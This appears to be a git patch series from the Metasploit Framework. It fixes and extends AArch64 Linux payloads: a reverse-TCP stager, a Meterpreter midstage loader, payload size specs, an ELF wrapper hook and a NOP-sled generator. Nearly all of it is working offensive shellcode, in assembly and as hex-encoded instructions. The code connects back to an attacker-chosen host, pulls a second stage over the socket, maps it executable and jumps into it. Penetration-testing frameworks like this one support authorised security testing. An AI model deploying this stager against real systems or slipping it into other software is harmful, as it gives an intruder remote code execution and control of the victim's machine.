From 6dbe00158fc62017354d1119f587936ebf74acdd Mon Sep 17 00:00:00 2001 From: Tim Date: Mon, 28 Aug 2017 21:11:31 +0800 Subject: [PATCH 1/7] fix stager --- .../linux/aarch64/stager_sock_reverse.s | 18 +++++++------ .../stagers/linux/aarch64/reverse_tcp.rb | 25 +++++++++++-------- 2 files changed, 26 insertions(+), 17 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s index 7c049b8308..7bf02f863e 100644 --- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s +++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s @@ -37,9 +37,10 @@ start: mov x2, #4 mov x8, SYS_READ svc 0 - cbz w0, failed + cmn x0, #0x1 + beq failed - ldr x2, [sp,#0] + ldr w2, [sp,#0] /* Page-align, assume <4GB */ lsr x2, x2, #12 @@ -53,12 +54,13 @@ start: mov x3, #34 mov x4, xzr mov x5, xzr - /* call mmap() */ - movi x8, SYS_MMAP + mov x8, SYS_MMAP svc 0 + cmn x0, #0x1 + beq failed /* Grab the saved size, save the address */ - ldr x4, [sp] + ldr w4, [sp] /* Save the memory address */ str x0, [sp] @@ -73,13 +75,15 @@ read_loop: mov x2, x4 mov x8, SYS_READ svc 0 + cmn x0, #0x1 + beq failed add x3, x3, x0 subs x4, x4, x0 bne read_loop /* Go to shellcode */ - ldr x30, [sp] - ret + ldr x0, [sp] + blr x0 failed: mov x0, 0 diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index 2ebf658320..e2faeb7cbf 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -33,8 +33,8 @@ module MetasploitModule { 'Offsets' => { - 'LPORT' => [ 186, 'n' ], - 'LHOST' => [ 188, 'ADDR' ], + 'LPORT' => [ 206, 'n' ], + 'LHOST' => [ 208, 'ADDR' ], }, 'Payload' => [ @@ -45,19 +45,20 @@ module MetasploitModule 0xd28018c8, # mov x8, #0xc6 // #198 0xd4000001, # svc #0x0 0xaa0003ec, # mov x12, x0 - 0x10000501, # adr x1, b8 + 0x100005a1, # adr x1, cc 0xd2800202, # mov x2, #0x10 // #16 0xd2801968, # mov x8, #0xcb // #203 0xd4000001, # svc #0x0 - 0x35000420, # cbnz w0, ac + 0x350004c0, # cbnz w0, c0 0xaa0c03e0, # mov x0, x12 0xd10043ff, # sub sp, sp, #0x10 0x910003e1, # mov x1, sp 0xd2800082, # mov x2, #0x4 // #4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 - 0x34000340, # cbz w0, ac - 0xf94003e2, # ldr x2, [sp] + 0xb100041f, # cmn x0, #0x1 + 0x540003c0, # b.eq c0 + 0xb94003e2, # ldr w2, [sp] 0xd34cfc42, # lsr x2, x2, #12 0x91000442, # add x2, x2, #0x1 0xd374cc42, # lsl x2, x2, #12 @@ -69,7 +70,9 @@ module MetasploitModule 0xaa1f03e5, # mov x5, xzr 0xd2801bc8, # mov x8, #0xde // #222 0xd4000001, # svc #0x0 - 0xf94003e4, # ldr x4, [sp] + 0xb100041f, # cmn x0, #0x1 + 0x54000200, # b.eq c0 + 0xb94003e4, # ldr w4, [sp] 0xf90003e0, # str x0, [sp] 0xaa0003e3, # mov x3, x0 0xaa0c03e0, # mov x0, x12 @@ -77,11 +80,13 @@ module MetasploitModule 0xaa0403e2, # mov x2, x4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 + 0xb100041f, # cmn x0, #0x1 + 0x540000c0, # b.eq c0 0x8b000063, # add x3, x3, x0 0xeb000084, # subs x4, x4, x0 - 0x54ffff21, # b.ne 84 - 0xf94003fe, # ldr x30, [sp] - 0xd65f03c0, # ret + 0x54fffee1, # b.ne 90 + 0xf94003e0, # ldr x0, [sp] + 0xd63f0000, # blr x0 0xd2800000, # mov x0, #0x0 // #0 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0 From a2396991f0ab6a53dbf01e880e931474005adb93 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 29 Aug 2017 10:22:04 +0800 Subject: [PATCH 2/7] stager not setting up stack --- .../shellcode/linux/aarch64/stage_mettle.s | 137 ++++++++++++++++++ .../stages/linux/aarch64/meterpreter.rb | 109 ++++++++++++++ 2 files changed, 246 insertions(+) create mode 100644 external/source/shellcode/linux/aarch64/stage_mettle.s create mode 100644 modules/payloads/stages/linux/aarch64/meterpreter.rb diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s new file mode 100644 index 0000000000..b10f4b8a32 --- /dev/null +++ b/external/source/shellcode/linux/aarch64/stage_mettle.s @@ -0,0 +1,137 @@ +.equ SYS_READ, 0x3f +.equ SYS_MMAP, 0xde +.equ SYS_EXIT, 0x5d + +.equ SIZE, 0xeeeeeeee +.equ ENTRY, 0xffffffff + +start: + adr x2, size + ldr w2, [x2] + mov x10, x2 + + /* Page-align, assume <4GB */ + lsr x2, x2, #12 + add x2, x2, #1 + lsl x2, x2, #12 + + /* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */ + mov x0, xzr + mov x1, x2 + mov x2, #7 + mov x3, #34 + mov x4, xzr + mov x5, xzr + mov x8, SYS_MMAP + svc 0 + + /* Grab the saved size, save the address */ + mov x4, x10 + + /* Save the memory address */ + mov x3, x0 + mov x10, x0 + +read_loop: + /* read(sockfd, buf='x3', nbytes='x4') */ + mov x0, x12 + mov x1, x3 + mov x2, x4 + mov x8, SYS_READ + svc 0 + cbz w0, failed + add x3, x3, x0 + subs x4, x4, x0 + bne read_loop + + /* set up the initial stack */ + /* + + add sp, sp, #80 + mov x4, #109 + eor x5, x5, x5 + stp x4, x5, [sp, #-16]! + + mov x1,#2 + mov x2,sp + mov x3,#0 + + mov x4,#2 + mov x5,sp + mov x6,x12 + mov x7,#0 + mov x8,#0 + mov x9,#7 + mov x10,x10 + mov x11,#0 + mov x12,#0 + + eor x0, x0, x0 + eor x1, x1, x1 + eor x2, x2, x2 + eor x3, x3, x3 + stp x4, x5, [sp, #-16]! + stp x6, x7, [sp, #-16]! + stp x7, x8, [sp, #-16]! + stp x9, x10, [sp, #-16]! + stp x11, x12, [sp, #-16]! + */ + + adr x0, entry + ldr x0, [x0] + // entry_offset + mmap + add x0, x0, x10 + + mov x8, x0 + + + /* Set up the fake stack. + For whatever reason, aarch64 binaries really want AT_RANDOM + to be available. */ + /* AT_NULL */ + eor x0, x0, x0 + eor x1, x1, x1 + stp x0, x1, [sp, #-16]! + /* AT_RANDOM */ + mov x2, #25 + mov x3, sp + stp x2, x3, [sp, #-16]! + + /* argc, argv[0], argv[1], envp */ + /* ideally these could all be empty, but unfortunately + we have to keep the stack aligned. it's easier to + just push an extra argument than care... */ + stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ + mov x0, 1 + mov x1, sp + stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + + br x8 + + /* + mov x0, #109 + mov x1, x12 + stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ + /* mov x0, 2 + mov x1, sp + stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + + /* + blr x8 + */ + +failed: + mov x0, 0 + mov x8, SYS_EXIT + svc 0 + +.balign 16 +size: + .word SIZE + .word 0 +entry: + .word ENTRY + .word 0 +m: +.word 0x0000006d +.word 0x00000000 diff --git a/modules/payloads/stages/linux/aarch64/meterpreter.rb b/modules/payloads/stages/linux/aarch64/meterpreter.rb new file mode 100644 index 0000000000..43a0ca6615 --- /dev/null +++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb @@ -0,0 +1,109 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/base/sessions/meterpreter_aarch64_linux' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'rex/elfparsey' + +module MetasploitModule + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter', + 'Description' => 'Inject the mettle server payload (staged)', + 'Author' => [ + 'Adam Cammack ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux + ) + ) + end + + def elf_ep(payload) + elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload)) + elf.elf_header.e_entry + end + + def handle_intermediate_stage(conn, payload) + entry_offset = elf_ep(payload) + + # Generated from external/source/shellcode/linux/aarch64/stage_mettle.s + midstager = [ + + + + 0x10000582, # adr x2, b0 + 0xb9400042, # ldr w2, [x2] + 0xaa0203ea, # mov x10, x2 + 0xd34cfc42, # lsr x2, x2, #12 + 0x91000442, # add x2, x2, #0x1 + 0xd374cc42, # lsl x2, x2, #12 + 0xaa1f03e0, # mov x0, xzr + 0xaa0203e1, # mov x1, x2 + 0xd28000e2, # mov x2, #0x7 // #7 + 0xd2800443, # mov x3, #0x22 // #34 + 0xaa1f03e4, # mov x4, xzr + 0xaa1f03e5, # mov x5, xzr + 0xd2801bc8, # mov x8, #0xde // #222 + 0xd4000001, # svc #0x0 + 0xaa0a03e4, # mov x4, x10 + 0xaa0003e3, # mov x3, x0 + 0xaa0003ea, # mov x10, x0 + 0xaa0c03e0, # mov x0, x12 + 0xaa0303e1, # mov x1, x3 + 0xaa0403e2, # mov x2, x4 + 0xd28007e8, # mov x8, #0x3f // #63 + 0xd4000001, # svc #0x0 + 0x34000260, # cbz w0, a4 + 0x8b000063, # add x3, x3, x0 + 0xeb000084, # subs x4, x4, x0 + 0x54ffff01, # b.ne 44 + 0x10000280, # adr x0, b8 + 0xf9400000, # ldr x0, [x0] + 0x8b0a0000, # add x0, x0, x10 + 0xaa0003e8, # mov x8, x0 + 0xca000000, # eor x0, x0, x0 + 0xca010021, # eor x1, x1, x1 + 0xa9bf07e0, # stp x0, x1, [sp,#-16]! + 0xd2800322, # mov x2, #0x19 // #25 + 0x910003e3, # mov x3, sp + 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! + 0xa9bf07e0, # stp x0, x1, [sp,#-16]! + 0xd2800020, # mov x0, #0x1 // #1 + 0x910003e1, # mov x1, sp + 0xa9bf07e0, # stp x0, x1, [sp,#-16]! + 0xd61f0100, # br x8 + 0xd2800000, # mov x0, #0x0 // #0 + 0xd2800ba8, # mov x8, #0x5d // #93 + 0xd4000001, # svc #0x0 + payload.length, + 0x00000000, # .word 0x00000000 + entry_offset, + 0x00000000, # .word 0x00000000 + 0x0000006d, # .word 0x0000006d + 0x00000000, # .word 0x00000000 + 0xd503201f, # nop + 0xd503201f, # nop + ].pack('V*') + + print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)") + print_status("Transmitting intermediate paystager...(#{payload.length} bytes)") + conn.put([midstager.length].pack('V')) + conn.put(midstager) == midstager.length + end + + def generate_stage(opts = {}) + MetasploitPayloads::Mettle.new('aarch64-linux-musl', + generate_config(opts.merge({scheme: 'tcp'}))).to_binary :process_image + end +end From 26f4fa3b09fde2501e8ee732091e23e526dacbf1 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 29 Aug 2017 12:24:05 +0800 Subject: [PATCH 3/7] setup stack --- .../shellcode/linux/aarch64/stage_mettle.s | 100 ++++++------------ .../stages/linux/aarch64/meterpreter.rb | 48 +++++---- 2 files changed, 62 insertions(+), 86 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s index b10f4b8a32..eedf65b677 100644 --- a/external/source/shellcode/linux/aarch64/stage_mettle.s +++ b/external/source/shellcode/linux/aarch64/stage_mettle.s @@ -44,81 +44,48 @@ read_loop: subs x4, x4, x0 bne read_loop - /* set up the initial stack */ - /* - - add sp, sp, #80 - mov x4, #109 - eor x5, x5, x5 - stp x4, x5, [sp, #-16]! - - mov x1,#2 - mov x2,sp - mov x3,#0 - - mov x4,#2 - mov x5,sp - mov x6,x12 - mov x7,#0 - mov x8,#0 - mov x9,#7 - mov x10,x10 - mov x11,#0 - mov x12,#0 - - eor x0, x0, x0 - eor x1, x1, x1 - eor x2, x2, x2 - eor x3, x3, x3 - stp x4, x5, [sp, #-16]! - stp x6, x7, [sp, #-16]! - stp x7, x8, [sp, #-16]! - stp x9, x10, [sp, #-16]! - stp x11, x12, [sp, #-16]! - */ - + /* add entry_offset */ adr x0, entry ldr x0, [x0] - // entry_offset + mmap add x0, x0, x10 + mov x14, x0 - mov x8, x0 + /* set up the initial stack */ + mov x0, sp + and sp, x0, #-16 + add sp, sp, #(16 * 6) + /* argc = 2, argv[0] = 'm' */ + mov x0, #2 + mov x1, #109 + str x1, [sp] + mov x1, sp + stp x0, x1, [sp, #-16]! - /* Set up the fake stack. - For whatever reason, aarch64 binaries really want AT_RANDOM - to be available. */ - /* AT_NULL */ - eor x0, x0, x0 - eor x1, x1, x1 - stp x0, x1, [sp, #-16]! - /* AT_RANDOM */ - mov x2, #25 - mov x3, sp - stp x2, x3, [sp, #-16]! + /* argc = 2, argv[1] = 'x12 (sockfd)' */ + mov x2, x12 + mov x3, 0 + stp x2, x3, [sp, #-16]! - /* argc, argv[0], argv[1], envp */ - /* ideally these could all be empty, but unfortunately - we have to keep the stack aligned. it's easier to - just push an extra argument than care... */ - stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ - mov x0, 1 - mov x1, sp - stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + mov x4, 0 + mov x5, #7 /* AT_BASE */ + stp x4, x5, [sp, #-16]! - br x8 + mov x6, x10 + mov x7, #6 /* AT_PAGESZ */ + stp x6, x7, [sp, #-16]! - /* - mov x0, #109 - mov x1, x12 - stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ - /* mov x0, 2 - mov x1, sp - stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + mov x8, #0x1000 + mov x9, #25 /* AT_RANDOM */ + stp x8, x9, [sp, #-16]! - /* - blr x8 - */ + mov x10, x10 + mov x11, #0 /* AT_NULL */ + stp x10, x11, [sp, #-16]! + + mov x29, #0 + mov x30, #0 + br x14 failed: mov x0, 0 @@ -132,6 +99,3 @@ size: entry: .word ENTRY .word 0 -m: -.word 0x0000006d -.word 0x00000000 diff --git a/modules/payloads/stages/linux/aarch64/meterpreter.rb b/modules/payloads/stages/linux/aarch64/meterpreter.rb index 43a0ca6615..a585ad2210 100644 --- a/modules/payloads/stages/linux/aarch64/meterpreter.rb +++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb @@ -41,8 +41,7 @@ module MetasploitModule midstager = [ - - 0x10000582, # adr x2, b0 + 0x10000782, # adr x2, f0 0xb9400042, # ldr w2, [x2] 0xaa0203ea, # mov x10, x2 0xd34cfc42, # lsr x2, x2, #12 @@ -64,36 +63,49 @@ module MetasploitModule 0xaa0403e2, # mov x2, x4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 - 0x34000260, # cbz w0, a4 + 0x34000440, # cbz w0, e0 0x8b000063, # add x3, x3, x0 0xeb000084, # subs x4, x4, x0 0x54ffff01, # b.ne 44 - 0x10000280, # adr x0, b8 + 0x10000480, # adr x0, f8 0xf9400000, # ldr x0, [x0] 0x8b0a0000, # add x0, x0, x10 - 0xaa0003e8, # mov x8, x0 - 0xca000000, # eor x0, x0, x0 - 0xca010021, # eor x1, x1, x1 - 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd2800322, # mov x2, #0x19 // #25 - 0x910003e3, # mov x3, sp - 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! - 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd2800020, # mov x0, #0x1 // #1 + 0xaa0003ee, # mov x14, x0 + 0x910003e0, # mov x0, sp + 0x927cec1f, # and sp, x0, #0xfffffffffffffff0 + 0x910183ff, # add sp, sp, #0x60 + 0xd2800040, # mov x0, #0x2 // #2 + 0xd2800da1, # mov x1, #0x6d // #109 + 0xf90003e1, # str x1, [sp] 0x910003e1, # mov x1, sp 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd61f0100, # br x8 + 0xaa0c03e2, # mov x2, x12 + 0xd2800003, # mov x3, #0x0 // #0 + 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! + 0xd2800004, # mov x4, #0x0 // #0 + 0xd28000e5, # mov x5, #0x7 // #7 + 0xa9bf17e4, # stp x4, x5, [sp,#-16]! + 0xaa0a03e6, # mov x6, x10 + 0xd28000c7, # mov x7, #0x6 // #6 + 0xa9bf1fe6, # stp x6, x7, [sp,#-16]! + 0xd2820008, # mov x8, #0x1000 // #4096 + 0xd2800329, # mov x9, #0x19 // #25 + 0xa9bf27e8, # stp x8, x9, [sp,#-16]! + 0xaa0a03ea, # mov x10, x10 + 0xd280000b, # mov x11, #0x0 // #0 + 0xa9bf2fea, # stp x10, x11, [sp,#-16]! + 0xd280001d, # mov x29, #0x0 // #0 + 0xd280001e, # mov x30, #0x0 // #0 + 0xd61f01c0, # br x14 0xd2800000, # mov x0, #0x0 // #0 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0 + 0xd503201f, # nop + payload.length, 0x00000000, # .word 0x00000000 entry_offset, 0x00000000, # .word 0x00000000 - 0x0000006d, # .word 0x0000006d - 0x00000000, # .word 0x00000000 - 0xd503201f, # nop - 0xd503201f, # nop ].pack('V*') print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)") From 7b71f60ea196747791cf41e42f7de2dc84047488 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 29 Aug 2017 12:42:35 +0800 Subject: [PATCH 4/7] fix the stack --- .../source/shellcode/linux/aarch64/stage_mettle.s | 12 ++++++------ .../payloads/stages/linux/aarch64/meterpreter.rb | 13 +++++-------- 2 files changed, 11 insertions(+), 14 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s index eedf65b677..f149105c1d 100644 --- a/external/source/shellcode/linux/aarch64/stage_mettle.s +++ b/external/source/shellcode/linux/aarch64/stage_mettle.s @@ -60,28 +60,28 @@ read_loop: mov x1, #109 str x1, [sp] mov x1, sp - stp x0, x1, [sp, #-16]! - /* argc = 2, argv[1] = 'x12 (sockfd)' */ mov x2, x12 mov x3, 0 - stp x2, x3, [sp, #-16]! mov x4, 0 mov x5, #7 /* AT_BASE */ - stp x4, x5, [sp, #-16]! mov x6, x10 mov x7, #6 /* AT_PAGESZ */ - stp x6, x7, [sp, #-16]! mov x8, #0x1000 mov x9, #25 /* AT_RANDOM */ - stp x8, x9, [sp, #-16]! mov x10, x10 mov x11, #0 /* AT_NULL */ + stp x10, x11, [sp, #-16]! + stp x8, x9, [sp, #-16]! + stp x6, x7, [sp, #-16]! + stp x4, x5, [sp, #-16]! + stp x2, x3, [sp, #-16]! + stp x0, x1, [sp, #-16]! mov x29, #0 mov x30, #0 diff --git a/modules/payloads/stages/linux/aarch64/meterpreter.rb b/modules/payloads/stages/linux/aarch64/meterpreter.rb index a585ad2210..ec2b24435f 100644 --- a/modules/payloads/stages/linux/aarch64/meterpreter.rb +++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb @@ -40,7 +40,6 @@ module MetasploitModule # Generated from external/source/shellcode/linux/aarch64/stage_mettle.s midstager = [ - 0x10000782, # adr x2, f0 0xb9400042, # ldr w2, [x2] 0xaa0203ea, # mov x10, x2 @@ -78,22 +77,22 @@ module MetasploitModule 0xd2800da1, # mov x1, #0x6d // #109 0xf90003e1, # str x1, [sp] 0x910003e1, # mov x1, sp - 0xa9bf07e0, # stp x0, x1, [sp,#-16]! 0xaa0c03e2, # mov x2, x12 0xd2800003, # mov x3, #0x0 // #0 - 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! 0xd2800004, # mov x4, #0x0 // #0 0xd28000e5, # mov x5, #0x7 // #7 - 0xa9bf17e4, # stp x4, x5, [sp,#-16]! 0xaa0a03e6, # mov x6, x10 0xd28000c7, # mov x7, #0x6 // #6 - 0xa9bf1fe6, # stp x6, x7, [sp,#-16]! 0xd2820008, # mov x8, #0x1000 // #4096 0xd2800329, # mov x9, #0x19 // #25 - 0xa9bf27e8, # stp x8, x9, [sp,#-16]! 0xaa0a03ea, # mov x10, x10 0xd280000b, # mov x11, #0x0 // #0 0xa9bf2fea, # stp x10, x11, [sp,#-16]! + 0xa9bf27e8, # stp x8, x9, [sp,#-16]! + 0xa9bf1fe6, # stp x6, x7, [sp,#-16]! + 0xa9bf17e4, # stp x4, x5, [sp,#-16]! + 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! + 0xa9bf07e0, # stp x0, x1, [sp,#-16]! 0xd280001d, # mov x29, #0x0 // #0 0xd280001e, # mov x30, #0x0 // #0 0xd61f01c0, # br x14 @@ -101,7 +100,6 @@ module MetasploitModule 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0 0xd503201f, # nop - payload.length, 0x00000000, # .word 0x00000000 entry_offset, @@ -109,7 +107,6 @@ module MetasploitModule ].pack('V*') print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)") - print_status("Transmitting intermediate paystager...(#{payload.length} bytes)") conn.put([midstager.length].pack('V')) conn.put(midstager) == midstager.length end From ffbf21cb1c9f1c6b1e2cca3154ee877489c13086 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 29 Aug 2017 13:08:40 +0800 Subject: [PATCH 5/7] cleanup --- external/source/shellcode/linux/aarch64/stage_mettle.s | 7 ++----- .../source/shellcode/linux/aarch64/stager_sock_reverse.s | 6 +++--- 2 files changed, 5 insertions(+), 8 deletions(-) diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s index f149105c1d..0092c737ef 100644 --- a/external/source/shellcode/linux/aarch64/stage_mettle.s +++ b/external/source/shellcode/linux/aarch64/stage_mettle.s @@ -2,9 +2,6 @@ .equ SYS_MMAP, 0xde .equ SYS_EXIT, 0x5d -.equ SIZE, 0xeeeeeeee -.equ ENTRY, 0xffffffff - start: adr x2, size ldr w2, [x2] @@ -94,8 +91,8 @@ failed: .balign 16 size: - .word SIZE + .word 0 .word 0 entry: - .word ENTRY + .word 0 .word 0 diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s index 7bf02f863e..f8b354fbc5 100644 --- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s +++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s @@ -37,7 +37,7 @@ start: mov x2, #4 mov x8, SYS_READ svc 0 - cmn x0, #0x1 + cmn x0, #0x1 beq failed ldr w2, [sp,#0] @@ -56,7 +56,7 @@ start: mov x5, xzr mov x8, SYS_MMAP svc 0 - cmn x0, #0x1 + cmn x0, #0x1 beq failed /* Grab the saved size, save the address */ @@ -75,7 +75,7 @@ read_loop: mov x2, x4 mov x8, SYS_READ svc 0 - cmn x0, #0x1 + cmn x0, #0x1 beq failed add x3, x3, x0 subs x4, x4, x0 From 195c1e041fdd3a3fa900d7f6a10a9d82b9ff4040 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Tue, 29 Aug 2017 10:09:38 -0500 Subject: [PATCH 6/7] Update payload specs and sizes Adds the new Aarch64 and R payloads fix merge --- modules/payloads/stagers/linux/aarch64/reverse_tcp.rb | 2 +- spec/modules/payloads_spec.rb | 11 +++++++++++ 2 files changed, 12 insertions(+), 1 deletion(-) diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index e2faeb7cbf..eb6ad11d09 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -17,7 +17,7 @@ require 'msf/core/handler/reverse_tcp' ### module MetasploitModule - CachedSize = 192 + CachedSize = 212 include Msf::Payload::Stager diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 646a3b041e..687dace6fa 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -4442,6 +4442,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/zarch/meterpreter_reverse_https' end + context 'linux/aarch64/meterpreter/reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/linux/aarch64/reverse_tcp', + 'stages/linux/aarch64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/meterpreter/reverse_tcp' + end + context 'linux/aarch64/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From 86ee77ffb045cb52290ea91f2d955a137cd1c3a5 Mon Sep 17 00:00:00 2001 From: Tim Date: Thu, 31 Aug 2017 18:33:09 +0800 Subject: [PATCH 7/7] add aarch64 nops and fix aarch64 cmdstager --- lib/msf/util/exe.rb | 8 +++++++ modules/nops/aarch64/simple.rb | 43 ++++++++++++++++++++++++++++++++++ 2 files changed, 51 insertions(+) create mode 100644 modules/nops/aarch64/simple.rb diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 7be5510b23..84f211c961 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -165,6 +165,14 @@ require 'msf/core/exe/segment_appender' # XXX: Add remaining ARMLE systems here end + if arch.index(ARCH_AARCH64) + if plat.index(Msf::Module::Platform::Linux) + return to_linux_aarch64_elf(framework, code) + end + + # XXX: Add remaining AARCH64 systems here + end + if arch.index(ARCH_PPC) if plat.index(Msf::Module::Platform::OSX) return to_osx_ppc_macho(framework, code) diff --git a/modules/nops/aarch64/simple.rb b/modules/nops/aarch64/simple.rb new file mode 100644 index 0000000000..29a0244d80 --- /dev/null +++ b/modules/nops/aarch64/simple.rb @@ -0,0 +1,43 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# SingleByte +# ---------- +# +# This class implements simple NOP generator for AARCH64 +# +### +class MetasploitModule < Msf::Nop + + def initialize + super( + 'Name' => 'Simple', + 'Alias' => 'armle_simple', + 'Description' => 'Simple NOP generator', + 'License' => MSF_LICENSE, + 'Arch' => ARCH_AARCH64) + register_advanced_options( + [ + OptBool.new('RandomNops', [ false, "Generate a random NOP sled", true ]) + ]) + end + + def generate_sled(length, opts) + random = opts['Random'] || datastore['RandomNops'] + nops = [ + 0xd503201f, # nop + 0xaa0103e1, # mov x1, x1 + 0xaa0203e2, # mov x2, x2 + 0x2a0303e3, # mov w3, w3 + 0x2a0403e4, # mov w4, w4 + ] + if random + return ([nops[rand(nops.length)]].pack("V*") * (length/4)) + end + return ([nops[0]].pack("V*") * (length/4)) + end +end \ No newline at end of file